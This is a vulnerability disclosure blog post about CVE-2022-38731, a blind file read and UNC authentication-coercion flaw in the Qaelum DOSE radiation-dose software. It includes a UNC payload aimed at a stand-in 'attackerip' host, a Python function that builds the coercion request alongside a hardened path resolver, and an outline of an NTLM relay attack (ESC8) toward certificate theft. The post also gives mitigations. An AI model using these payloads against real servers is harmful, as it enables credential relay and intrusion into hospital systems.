How our Ethical Hacking team discovered a “zero-day” vulnerability

In our Ethical Hacking team, the day-to-day work involves putting ourselves in the mindset of an attacker and attempting to compromise the agreed targets in order to improve our clients' security posture. This often means finding and exploiting known vulnerabilities and misconfigurations, but it also means digging deeper to find vulnerabilities that are not yet known, more commonly called "zero-day" vulnerabilities.

During a recent internal infrastructure engagement, a member of the Ethical Hacking team (James Taylor) was able to discover one such vulnerability within a third-party web application.

Technical details

In this case, the discovered vulnerability was a blind arbitrary file read: the attacker could request any file on the system by absolute path, but the file's contents were only returned when the file was an image. The same parameter also accepted Universal Naming Convention (UNC) paths, which meant it could additionally be used for authentication coercion (forcing the server to authenticate to a host of the attacker's choosing).

The software in question was Qaelum DOSE, which the vendor describes as "...a dose management solution that automatically monitors, evaluates and reports the radiation dose that patients receive for multi-facility, multi-modality and multi-vendor imaging environments".

The vulnerability

Specifically, DOSE versions 18.08 through 21.1 (fixed in 21.2) allow an attacker to supply an absolute file path via the "name" parameter of the "loadimages" route. This allows the attacker to display an arbitrary image from the local file system or, by supplying a UNC path such as "\\attackerip\file.jpg", from a remote system.

Although any file can be requested, only image files are rendered back to the attacker. Files on the local system can still be enumerated, however, because the "Content-Type" header reflects the actual type of the file that was read, so an attacker can confirm whether a given path exists and what kind of file it is. Enumeration is interesting, but on its own the impact is limited.
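The root cause described above is a path parameter that is joined onto the application's image directory with ordinary path-join semantics, so an absolute or UNC value replaces the base directory entirely. The following is an added example written for this page, not Qaelum's code: `vulnerable_resolve` models the behaviour the advisory describes, `safe_resolve` is a hardened replacement that rejects UNC, drive-qualified, rooted and traversing names, and `coercion_url` shows the request an attacker would send to trigger the SMB connection. `IMAGE_ROOT` and the `/loadimages` URL path are assumptions for illustration (the advisory names only the route and the `name` parameter); Windows path rules are applied through `ntpath` so the module runs on any OS.

```python
"""Added example: vulnerable vs hardened handling of the loadimages "name" parameter.

Not Qaelum's code. IMAGE_ROOT and the /loadimages path are assumptions.
"""
import ntpath
from urllib.parse import urlencode, urljoin

# Assumed location of the application's image store (hypothetical).
IMAGE_ROOT = r"C:\Program Files\DOSE\images"


def vulnerable_resolve(name: str) -> str:
    """Vulnerable pattern: a plain join discards IMAGE_ROOT when name is absolute or UNC."""
    return ntpath.join(IMAGE_ROOT, name)


def safe_resolve(name: str) -> str:
    """Return the path under IMAGE_ROOT that name refers to, or raise ValueError."""
    if not name or "\x00" in name:
        raise ValueError("empty name or embedded NUL")
    # Windows accepts forward slashes as separators, so normalise before checking.
    normalised = name.replace("/", "\\")
    # UNC forms (\\host\share\..., \\?\UNC\host\share\...): the server would
    # authenticate to "host" over SMB, which is the coercion primitive.
    if normalised.startswith("\\\\"):
        raise ValueError("UNC path rejected")
    drive, rest = ntpath.splitdrive(normalised)
    # C:\..., C:file (drive-relative) and \rooted names all escape IMAGE_ROOT.
    if drive or rest.startswith("\\"):
        raise ValueError("absolute or drive-qualified path rejected")
    root = ntpath.normpath(IMAGE_ROOT)
    candidate = ntpath.normpath(ntpath.join(root, normalised))
    # After "..\" segments are collapsed the result must still sit below the
    # root; commonpath raises ValueError itself if the drives differ.
    try:
        inside = ntpath.commonpath([root, candidate]) == root
    except ValueError:
        inside = False
    if not inside:
        raise ValueError("path traversal rejected")
    return candidate


def is_allowed(name: str) -> bool:
    """True if safe_resolve would accept name."""
    try:
        safe_resolve(name)
        return True
    except ValueError:
        return False


def coercion_url(base_url: str, attacker_host: str) -> str:
    """Build the request that makes the server fetch an "image" from the attacker's host.

    Backslashes are percent-encoded so the UNC path survives URL parsing.
    """
    query = urlencode({"name": f"\\\\{attacker_host}\\file.jpg"})
    return urljoin(base_url, "/loadimages") + "?" + query


if __name__ == "__main__":
    probes = ("scan1.jpg", r"\\attackerip\file.jpg", r"C:\Windows\win.ini",
              r"..\..\..\Windows\win.ini")
    for probe in probes:
        verdict = "allowed" if is_allowed(probe) else "REJECTED"
        print(f"{probe!r:32} vulnerable -> {vulnerable_resolve(probe)}")
        print(f"{'':32} hardened   -> {verdict}")
    print(coercion_url("http://dose.example.local/", "attackerip"))
```

The hardened resolver deliberately does not rely on `ntpath.isabs`, whose treatment of single-slash names changed between Python versions; it rejects by construction (no UNC prefix, no drive, not rooted) and then verifies containment after normalisation, which is the check that catches `..\` traversal.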

Increasing the impact

Because UNC paths are accepted, the server can be made to connect to a host of the attacker's choosing. An attacker can therefore stand up a malicious SMB server (for example with Impacket's "ntlmrelayx.py") and relay the NTLM authentication that the DOSE service presents when it tries to fetch the "image"; if the service runs under a system account, that authentication is the server's machine account. Additionally, when the domain has a certificate authority with the web enrollment feature enabled, the authentication can be relayed to the enrollment HTTP endpoint (the attack commonly referred to as ESC8) to obtain a certificate for that account, which can then be used to authenticate to the domain and potentially achieve remote code execution on the vulnerable server. This relay step depends on the enrollment endpoint accepting NTLM over plain HTTP without Extended Protection for Authentication; where the endpoint is hardened, the relay fails.

In Summary

This vulnerability is now tracked as CVE-2022-38731 and we recommend that affected clients upgrade to the latest stable, non-vulnerable version (21.2 or later). Where an upgrade cannot be applied immediately, blocking outbound SMB (TCP 445) from the DOSE server and enforcing Extended Protection for Authentication on any AD CS web enrollment endpoint removes the coercion and relay paths described above, although the file enumeration remains. For more detailed information on the issue, please see the advisory at: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38731.

If you would like to engage the services of the Ethical Hacking team, and see how they could help to improve your security posture, please contact Stuart Criddle.

Disclosure timeline

  • Vulnerability discovery - 27/05/2022
  • Vendor disclosure - 31/05/2022
  • Vendor fix - 27/06/2022
  • CVE request - 24/08/2022
  • CVE assigned - 24/08/2022
  • Vendor confirms public disclosure - 16/09/2022
  • Public disclosure - 13/02/2023

Contact us

Stuart Criddle
Ethical Hacking Lead, PwC United Kingdom
Tel: +44 (0)7483 416716

Kris McConkey
Cyber Threat Operations Lead Partner, PwC United Kingdom
Tel: +44 (0)7725 707360